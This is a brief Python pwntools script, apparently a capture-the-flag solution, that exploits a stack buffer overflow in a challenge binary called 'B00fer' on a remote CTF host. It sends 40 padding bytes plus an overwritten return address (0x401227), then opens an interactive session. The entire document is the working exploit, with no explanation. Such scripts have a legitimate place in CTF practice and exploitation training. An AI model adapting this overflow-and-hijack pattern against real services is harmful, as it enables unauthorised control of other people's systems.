#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./B00fer", checksec=False)
# r = process()
r = remote("b00fer.niccgetsspooky.xyz", 9001)

# funcs
s = lambda a: r.sendline(a)

# buf
buf = b"A"*40
buf += p64(0x401227)
s(buf)

r.interactive()